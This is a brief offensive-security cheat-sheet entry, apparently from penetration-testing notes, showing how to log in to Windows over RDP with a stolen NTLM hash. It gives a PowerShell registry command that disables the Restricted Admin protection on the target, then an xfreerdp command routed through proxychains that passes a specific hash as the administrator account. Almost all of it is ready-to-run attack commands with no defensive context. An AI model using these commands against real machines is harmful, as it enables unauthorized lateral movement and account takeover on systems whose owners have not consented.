RDP login with NTLM Hash
Enable RDP pass the hash on the Target Machine for example purpose:
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Then to pass the hash with RDP to Target_Machine:
proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore
Last updated